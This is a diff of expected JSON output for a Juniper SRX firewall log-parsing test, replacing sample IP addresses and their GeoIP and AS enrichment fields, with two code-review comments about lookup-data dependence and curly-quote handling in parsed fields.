 "destination.nat.ip": "18.51.100.12",
 "destination.nat.port": 46384,
@@ -378,7 +359,7 @@
 "juniper.srx.session_id_32": "41",
 "juniper.srx.tag": "RT_FLOW_SESSION_CREATE",
 "log.level": "informational",
- "log.offset": 3366,
+ "log.offset": 3402,
 "network.iana_number": "1",
 "observer.egress.zone": "untrustZone",
 "observer.ingress.interface.name": "ge-0/0/1.0", 
@@ -413,12 +394,9 @@
 "client.nat.port": 1,
 "client.packets": 1,
 "client.port": 1,
+ "destination.as.number": 3,
+ "destination.as.organization.name": "Massachusetts Institute of Technology",
 "destination.bytes": 84,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "198.51.100.12",
 "destination.nat.ip": "18.51.100.12",
 "destination.nat.port": 46384,
@@ -451,7 +429,7 @@
 "juniper.srx.session_id_32": "41",
 "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE",
 "log.level": "informational",
- "log.offset": 3933,
+ "log.offset": 3969,
 "network.bytes": 168,
 "network.iana_number": "1",
 "network.packets": 2,
@@ -492,14 +470,7 @@
 "client.nat.port": 19162,
 "client.packets": 6,
 "client.port": 47776,
- "destination.as.number": 14627,
- "destination.as.organization.name": "Vitalwerks Internet Solutions, LLC",
 "destination.bytes": 535,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "8.23.224.110",
 "destination.nat.ip": "8.23.224.110",
 "destination.nat.port": 80,
@@ -541,7 +512,7 @@
 "juniper.srx.src_nat_rule_type": "source rule",
 "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE",
 "log.level": "informational",
- "log.offset": 4637,
+ "log.offset": 4673,
 "network.bytes": 872,
 "network.iana_number": "6",
 "network.packets": 10,
@@ -615,7 +586,7 @@
 "juniper.srx.session_id_32": "206",
 "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE",
 "log.level": "informational",
- "log.offset": 5739,
+ "log.offset": 5779,
 "network.bytes": 5849,
 "network.iana_number": "6",
 "network.packets": 22, 
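Review bot: The new side of the `@@ -492,14 +470,7 @@` hunk asserts that 8.23.224.110 carries no `destination.as.*` or `destination.geo.*` fields at all, and the `@@ -651` and `@@ -904` hunks on the following lines do the same for 58.68.126.198 and 207.17.137.56. Those are still routable public addresses left over in flow.log, so the expectation holds only for as long as the test GeoIP database happens to have no record for them; a database refresh would reintroduce exactly the churn this commit presumably set out to remove. Replacing the remaining public addresses in flow.log with the documentation or test-database ranges the rest of the change already uses (`175.16.199.1`, `81.2.69.143`, `67.43.156.14`) and regenerating this file would make the expected output independent of lookup data.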
@@ -651,18 +622,11 @@
 {
 "@timestamp": "2018-10-06T23:32:20.898-02:00",
 "client.bytes": 72,
- "client.ip": "100.73.10.92",
+ "client.ip": "67.43.156.14",
 "client.nat.port": 11152,
 "client.packets": 1,
 "client.port": 52890,
- "destination.as.number": 10201,
- "destination.as.organization.name": "Dishnet Wireless Limited. Broadband Wireless",
 "destination.bytes": 136,
- "destination.geo.continent_name": "Asia",
- "destination.geo.country_iso_code": "IN",
- "destination.geo.country_name": "India",
- "destination.geo.location.lat": 20.0,
- "destination.geo.location.lon": 77.0,
 "destination.ip": "58.68.126.198",
 "destination.nat.ip": "58.68.126.198",
 "destination.nat.port": 53, 
@@ -677,7 +641,7 @@
 "event.end": "2018-10-06T23:32:28.898-02:00",
 "event.kind": "event",
 "event.module": "juniper",
- "event.original": "reason=\"idle Timeout\" source-address=\"100.73.10.92\" source-port=\"52890\" destination-address=\"58.68.126.198\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"58.78.140.131\" nat-source-port=\"11152\" nat-destination-address=\"58.68.126.198\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"NAT_S\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"NAT\" source-zone-name=\"Gi_nat\" destination-zone-name=\"Internet\" session-id-32=\"220368889\" packets-from-client=\"1\" bytes-from-client=\"72\" packets-from-server=\"1\" bytes-from-server=\"136\" elapsed-time=\"8\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.108\" encrypted=\"UNKNOWN\"",
+ "event.original": "reason=\"idle Timeout\" source-address=\"67.43.156.14\" source-port=\"52890\" destination-address=\"58.68.126.198\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"58.78.140.131\" nat-source-port=\"11152\" nat-destination-address=\"58.68.126.198\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"NAT_S\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"NAT\" source-zone-name=\"Gi_nat\" destination-zone-name=\"Internet\" session-id-32=\"220368889\" packets-from-client=\"1\" bytes-from-client=\"72\" packets-from-server=\"1\" bytes-from-server=\"136\" elapsed-time=\"8\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.108\" encrypted=\"UNKNOWN\"",
 "event.outcome": "success",
 "event.severity": 14,
 "event.start": "2018-10-06T23:32:20.898-02:00", 
@@ -697,7 +661,7 @@
 "juniper.srx.src_nat_rule_type": "source rule",
 "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE",
 "log.level": "informational",
- "log.offset": 6497,
+ "log.offset": 6541,
 "network.bytes": 208,
 "network.iana_number": "17",
 "network.packets": 2,
@@ -709,9 +673,9 @@
 "observer.type": "firewall",
 "observer.vendor": "Juniper",
 "related.ip": [
- "100.73.10.92",
 "58.68.126.198",
- "58.78.140.131"
+ "58.78.140.131",
+ "67.43.156.14"
 ],
 "rule.name": "NAT",
 "server.bytes": 136,
@@ -720,18 +684,14 @@
 "server.packets": 1,
 "server.port": 53,
 "service.type": "juniper",
- "source.as.number": 3786,
- "source.as.organization.name": "LG DACOM Corporation",
+ "source.as.number": 35908,
 "source.bytes": 72,
- "source.geo.city_name": "Seogwipo",
 "source.geo.continent_name": "Asia",
- "source.geo.country_iso_code": "KR",
- "source.geo.country_name": "South Korea",
- "source.geo.location.lat": 33.2486,
- "source.geo.location.lon": 126.5628,
- "source.geo.region_iso_code": "KR-49",
- "source.geo.region_name": "Jeju-do",
- "source.ip": "100.73.10.92",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "source.nat.ip": "58.78.140.131",
 "source.nat.port": 11152,
 "source.packets": 1, 
@@ -748,16 +708,17 @@
 "client.nat.port": 20215,
 "client.packets": 1,
 "client.port": 62047,
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
 "destination.bytes": 116,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 53,
 "destination.packets": 1,
 "destination.port": 53, 
@@ -770,7 +731,7 @@
 "event.end": "2018-06-30T00:17:25.753-02:00",
 "event.kind": "event",
 "event.module": "juniper",
- "event.original": "reason=\"idle Timeout\" source-address=\"192.168.255.2\" source-port=\"62047\" destination-address=\"8.8.8.8\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"192.168.0.47\" nat-source-port=\"20215\" nat-destination-address=\"8.8.8.8\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"rule001\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"trust-to-untrust-001\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"9621\" packets-from-client=\"1\" bytes-from-client=\"67\" packets-from-server=\"1\" bytes-from-server=\"116\" elapsed-time=\"3\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"fe-0/0/1.0\" encrypted=\"UNKNOWN\"",
+ "event.original": "reason=\"idle Timeout\" source-address=\"192.168.255.2\" source-port=\"62047\" destination-address=\"175.16.199.1\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"192.168.0.47\" nat-source-port=\"20215\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"rule001\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"trust-to-untrust-001\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"9621\" packets-from-client=\"1\" bytes-from-client=\"67\" packets-from-server=\"1\" bytes-from-server=\"116\" elapsed-time=\"3\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"fe-0/0/1.0\" encrypted=\"UNKNOWN\"",
 "event.outcome": "success",
 "event.severity": 14,
 "event.start": "2018-06-30T00:17:22.753-02:00", 
@@ -790,7 +751,7 @@ "juniper.srx.src_nat_rule_type": "source rule", "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE", "log.level": "informational", - "log.offset": 7350, + "log.offset": 7398, "network.bytes": 183, "network.iana_number": "17", "network.packets": 2, @@ -802,13 +763,13 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ + "175.16.199.1", "192.168.0.47", - "192.168.255.2", - "8.8.8.8" + "192.168.255.2" ], "rule.name": "trust-to-untrust-001", "server.bytes": 116, - "server.ip": "8.8.8.8", + "server.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -867,7 +828,7 @@ "juniper.srx.src_nat_rule_name": "SNAT-Policy5", "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE", "log.level": "informational", - "log.offset": 8203, + "log.offset": 8265, "network.bytes": 0, "network.iana_number": "6", "network.packets": 0, @@ -904,16 +865,9 @@ }, { "@timestamp": "2013-01-19T15:18:17.040-02:00", - "client.ip": "192.168.224.30", + "client.ip": "67.43.156.12", "client.nat.port": 14406, "client.port": 3129, - "destination.as.number": 701, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "207.17.137.56", "destination.nat.ip": "207.17.137.56", "destination.nat.port": 21, 
@@ -925,7 +879,7 @@ "event.dataset": "juniper.srx", "event.kind": "event", "event.module": "juniper", - "event.original": "source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"207.17.137.56\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"173.167.224.7\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"", + "event.original": "source-address=\"67.43.156.12\" source-port=\"3129\" destination-address=\"207.17.137.56\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"173.167.224.7\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"", "event.outcome": "success", "event.severity": 14, "event.timezone": "-02:00", @@ -942,7 +896,7 @@ "juniper.srx.src_nat_rule_name": "1", "juniper.srx.tag": "APPTRACK_SESSION_CREATE", "log.level": "informational", - "log.offset": 9012, + "log.offset": 9078, "network.iana_number": "6", "observer.egress.zone": "Danger", "observer.ingress.zone": "LAN", 
@@ -952,25 +906,21 @@ "observer.vendor": "Juniper", "related.ip": [ "173.167.224.7", - "192.168.224.30", - "207.17.137.56" + "207.17.137.56", + "67.43.156.12" ], "rule.name": "General-Outbound", "server.ip": "207.17.137.56", "server.nat.port": 21, "server.port": 21, "service.type": "juniper", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "Plymouth", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 42.3695, - "source.geo.location.lon": -83.4769, - "source.geo.region_iso_code": "US-MI", - "source.geo.region_name": "Michigan", - "source.ip": "192.168.224.30", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "source.nat.ip": "173.167.224.7", "source.nat.port": 14406, "source.port": 3129, @@ -982,18 +932,11 @@ { "@timestamp": "2013-01-19T15:18:17.040-02:00", "client.bytes": 48, - "client.ip": "192.168.224.30", + "client.ip": "67.43.156.12", "client.nat.port": 14406, "client.packets": 1, "client.port": 3129, - "destination.as.number": 701, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "207.17.137.56", "destination.nat.ip": "207.17.137.56", "destination.nat.port": 21, 
@@ -1008,7 +951,7 @@ "event.end": "2013-01-19T15:18:17.040-02:00", "event.kind": "event", "event.module": "juniper", - "event.original": "source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"207.17.137.56\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"173.167.224.7\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"1\" bytes-from-client=\"48\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"0\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"", + "event.original": "source-address=\"67.43.156.12\" source-port=\"3129\" destination-address=\"207.17.137.56\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"173.167.224.7\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"1\" bytes-from-client=\"48\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"0\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"", "event.outcome": "success", "event.severity": 14, "event.start": "2013-01-19T15:18:17.040-02:00", @@ -1026,7 +969,7 @@ "juniper.srx.src_nat_rule_name": "1", "juniper.srx.tag": "APPTRACK_SESSION_VOL_UPDATE", "log.level": "informational", - "log.offset": 9631, + "log.offset": 9699, "network.bytes": 48, "network.iana_number": "6", "network.packets": 1, 
@@ -1038,8 +981,8 @@ "observer.vendor": "Juniper", "related.ip": [ "173.167.224.7", - "192.168.224.30", - "207.17.137.56" + "207.17.137.56", + "67.43.156.12" ], "rule.name": "General-Outbound", "server.bytes": 0, @@ -1048,18 +991,14 @@ "server.packets": 0, "server.port": 21, "service.type": "juniper", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.as.number": 35908, "source.bytes": 48, - "source.geo.city_name": "Plymouth", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 42.3695, - "source.geo.location.lon": -83.4769, - "source.geo.region_iso_code": "US-MI", - "source.geo.region_name": "Michigan", - "source.ip": "192.168.224.30", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "source.nat.ip": "173.167.224.7", "source.nat.port": 14406, "source.packets": 1, @@ -1072,18 +1011,11 @@ { "@timestamp": "2013-01-19T15:18:17.040-02:00", "client.bytes": 144, - "client.ip": "192.168.224.30", + "client.ip": "67.43.156.12", "client.nat.port": 14406, "client.packets": 3, "client.port": 3129, - "destination.as.number": 701, - "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", "destination.bytes": 104, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "207.17.137.56", "destination.nat.ip": "207.17.137.56", "destination.nat.port": 21, 
@@ -1098,7 +1030,7 @@ "event.end": "2013-01-19T15:18:18.040-02:00", "event.kind": "event", "event.module": "juniper", - "event.original": "reason=\"application failure or action\" source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"207.17.137.56\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"FTP\" nested-application=\"UNKNOWN\" nat-source-address=\"173.167.224.7\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"3\" bytes-from-client=\"144\" packets-from-server=\"2\" bytes-from-server=\"104\" elapsed-time=\"1\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"", + "event.original": "reason=\"application failure or action\" source-address=\"67.43.156.12\" source-port=\"3129\" destination-address=\"207.17.137.56\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"FTP\" nested-application=\"UNKNOWN\" nat-source-address=\"173.167.224.7\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"3\" bytes-from-client=\"144\" packets-from-server=\"2\" bytes-from-server=\"104\" elapsed-time=\"1\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"", "event.outcome": "success", "event.severity": 14, "event.start": "2013-01-19T15:18:17.040-02:00", @@ -1118,7 +1050,7 @@ "juniper.srx.src_nat_rule_name": "1", "juniper.srx.tag": "APPTRACK_SESSION_CLOSE", "log.level": "informational", - "log.offset": 10364, + "log.offset": 10434, "network.bytes": 248, "network.iana_number": "6", "network.packets": 5, 
@@ -1130,8 +1062,8 @@ "observer.vendor": "Juniper", "related.ip": [ "173.167.224.7", - "192.168.224.30", - "207.17.137.56" + "207.17.137.56", + "67.43.156.12" ], "rule.name": "General-Outbound", "server.bytes": 104, @@ -1140,18 +1072,14 @@ "server.packets": 2, "server.port": 21, "service.type": "juniper", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.as.number": 35908, "source.bytes": 144, - "source.geo.city_name": "Plymouth", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 42.3695, - "source.geo.location.lon": -83.4769, - "source.geo.region_iso_code": "US-MI", - "source.geo.region_name": "Michigan", - "source.ip": "192.168.224.30", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "source.nat.ip": "173.167.224.7", "source.nat.port": 14406, "source.packets": 3, @@ -1164,18 +1092,11 @@ { "@timestamp": "2013-01-19T15:18:18.040-02:00", "client.bytes": 19592, - "client.ip": "4.0.0.1", + "client.ip": "67.43.156.12", "client.nat.port": 33040, "client.packets": 371, "client.port": 33040, - "destination.as.number": 29256, - "destination.as.organization.name": "Syrian Telecom", "destination.bytes": 686432, - "destination.geo.continent_name": "Asia", - "destination.geo.country_iso_code": "SY", - "destination.geo.country_name": "Syria", - "destination.geo.location.lat": 35.0, - "destination.geo.location.lon": 38.0, "destination.ip": "5.0.0.1", "destination.nat.ip": "5.0.0.1", "destination.nat.port": 80, 
@@ -1190,7 +1111,7 @@ "event.end": "2013-01-19T15:19:18.040-02:00", "event.kind": "event", "event.module": "juniper", - "event.original": "source-address=\"4.0.0.1\" source-port=\"33040\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"4.0.0.1\" nat-source-port=\"33040\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" packets-from-client=\"371\" bytes-from-client=\"19592\" packets-from-server=\"584\" bytes-from-server=\"686432\" elapsed-time=\"60\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d", + "event.original": "source-address=\"67.43.156.12\" source-port=\"33040\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.12\" nat-source-port=\"33040\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" packets-from-client=\"371\" bytes-from-client=\"19592\" packets-from-server=\"584\" bytes-from-server=\"686432\" elapsed-time=\"60\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d", "event.outcome": "success", "event.severity": 14, "event.start": "2013-01-19T15:18:18.040-02:00", 
@@ -1212,7 +1133,7 @@ "juniper.srx.session_id_32": "28", "juniper.srx.tag": "APPTRACK_SESSION_VOL_UPDATE", "log.level": "informational", - "log.offset": 11130, + "log.offset": 11202, "network.bytes": 706024, "network.iana_number": "6", "network.packets": 955, @@ -1224,8 +1145,8 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "4.0.0.1", - "5.0.0.1" + "5.0.0.1", + "67.43.156.12" ], "related.user": [ "user1" @@ -1237,16 +1158,15 @@ "server.packets": 584, "server.port": 80, "service.type": "juniper", - "source.as.number": 3356, - "source.as.organization.name": "Level 3 Parent, LLC", + "source.as.number": 35908, "source.bytes": 19592, - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "4.0.0.1", - "source.nat.ip": "4.0.0.1", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", + "source.nat.ip": "67.43.156.12", "source.nat.port": 33040, "source.packets": 371, "source.port": 33040, @@ -1258,16 +1178,9 @@ }, { "@timestamp": "2013-01-19T15:18:19.040-02:00", - "client.ip": "4.0.0.1", + "client.ip": "67.43.156.12", "client.nat.port": 33040, "client.port": 33040, - "destination.as.number": 29256, - "destination.as.organization.name": "Syrian Telecom", - "destination.geo.continent_name": "Asia", - "destination.geo.country_iso_code": "SY", - "destination.geo.country_name": "Syria", - "destination.geo.location.lat": 35.0, - "destination.geo.location.lon": 38.0, "destination.ip": "5.0.0.1", "destination.nat.ip": "5.0.0.1", "destination.nat.port": 80, 
@@ -1279,7 +1192,7 @@ "event.dataset": "juniper.srx", "event.kind": "event", "event.module": "juniper", - "event.original": "source-address=\"4.0.0.1\" source-port=\"33040\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"4.0.0.1\" nat-source-port=\"33040\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" profile-name=\u201dpf1\u201d rule-name=\u201dfacebook1\u201d routing-instance=\u201dinstance1\u201d destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d", + "event.original": "source-address=\"67.43.156.12\" source-port=\"33040\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.12\" nat-source-port=\"33040\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" profile-name=\u201dpf1\u201d rule-name=\u201dfacebook1\u201d routing-instance=\u201dinstance1\u201d destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d", "event.outcome": "success", "event.severity": 14, "event.timezone": "-02:00", @@ -1303,7 +1216,7 @@ "juniper.srx.session_id_32": "28", "juniper.srx.tag": "APPTRACK_SESSION_ROUTE_UPDATE", "log.level": "informational", - "log.offset": 11929, + "log.offset": 12015, "network.iana_number": "6", "observer.egress.interface.name": "\u201dst0.0\u201d", "observer.egress.zone": "untrust", 
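Review bot: The curly quotes from the SRX log line survive into the ECS field on the new side of this hunk: `"observer.egress.interface.name": "\u201dst0.0\u201d"` comes from `destination-interface-name=\u201dst0.0\u201d` in `event.original`, so the stored value is `”st0.0”` rather than `st0.0`, and any detection rule or dashboard filter matching the interface name verbatim will miss these events. This fixture only records what the pipeline emitted, so the fix presumably belongs in the juniper/srx ingest pipeline's key-value unquoting (treat U+201C/U+201D like the ASCII double quote), not in this file; the same quoting appears in `apbr-rule-type=\u201ddefault\u201d`, `profile-name=\u201dpf1\u201d` and `routing-instance=\u201dinstance1\u201d` on the surrounding events, so those fields are likely affected too. The issue is pre-existing rather than introduced by this commit, but since the commit re-baselines these expectations it is a good moment to file a follow-up.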
@@ -1313,8 +1226,8 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "4.0.0.1", - "5.0.0.1" + "5.0.0.1", + "67.43.156.12" ], "related.user": [ "user1" @@ -1324,15 +1237,14 @@ "server.nat.port": 80, "server.port": 80, "service.type": "juniper", - "source.as.number": 3356, - "source.as.organization.name": "Level 3 Parent, LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "4.0.0.1", - "source.nat.ip": "4.0.0.1", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", + "source.nat.ip": "67.43.156.12", "source.nat.port": 33040, "source.port": 33040, "source.user.name": "user1", @@ -1344,18 +1256,11 @@ { "@timestamp": "2013-01-19T15:18:20.040-02:00", "client.bytes": 392, - "client.ip": "4.0.0.1", + "client.ip": "67.43.156.12", "client.nat.port": 48873, "client.packets": 5, "client.port": 48873, - "destination.as.number": 29256, - "destination.as.organization.name": "Syrian Telecom", "destination.bytes": 646, - "destination.geo.continent_name": "Asia", - "destination.geo.country_iso_code": "SY", - "destination.geo.country_name": "Syria", - "destination.geo.location.lat": 35.0, - "destination.geo.location.lon": 38.0, "destination.ip": "5.0.0.1", "destination.nat.ip": "5.0.0.1", "destination.nat.port": 80, 
